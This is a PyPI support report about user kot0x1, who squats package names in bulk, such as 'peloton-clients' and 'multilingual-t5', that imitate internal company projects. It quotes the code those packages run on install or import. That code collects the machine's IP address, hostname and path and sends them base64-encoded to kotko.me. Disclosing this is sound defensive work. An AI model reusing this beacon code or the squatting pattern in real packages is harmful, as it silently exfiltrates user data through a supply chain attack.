Mass name squat by user: kot0x1

PyPI user performing the mass project name squatting

Additional information

All of the user's packages have the same format: after installation, or on import, the following code runs:

ip = requests.get('https://api.ipify.org').text
ipText = format(ip);
myhost = os.uname()[1]
currentPath = requests.utils.quote(bytes(pathlib.Path(__file__).parent.absolute()));

PYdata = { "ip": ipText,
           "host": myhost,
           "path": currentPath, }
PYdataS = ipText+","+myhost+",("+currentPath+")"

message = PYdataS
message_bytes = message.encode('ascii')
base64_bytes = base64.b64encode(message_bytes)
base64_message = base64_bytes.decode('ascii')

r  = requests.get("https://kotko.me?"+company+name+"="+base64_message)

This looks to be gathering information about the user's IP address and computer info (via os.uname) and sending that to a remote server along with the name of the company/companies being targeted by the squat.

I can only assume this is supposed to be a supply chain attack, although the packages don't appear to be attempting to gain control over the user's PC. Some of the projects have descriptions like "Proof by kotko", as if they are trying to prove that a supply chain attack is possible.

None of the projects have wheels, so will be built from the sdist and trigger the code to report back to the remote server.

For at least some of the projects, the homepage URL points to a non-existent github repository.

The following table lists the projects, along with the companies listed within the packages (which I assume are targets).

Package	Company
peloton-clients	uber/peloton
rtxt-dep1	grindrlabs/fpm/spec/fixtures
gearbest-parser	ubiquiti/home-assistant-public
multilingual-t5	google-research/byt5
floogle	GoogleCloudPlatform—runtimes-common
decoratorOperations	salesforce/decorator-operations/setup.py
pytest-capturelogs	dropbox/hermes

Code of Conduct

[X] I agree to follow the PSF Code of Conduct

pypi / support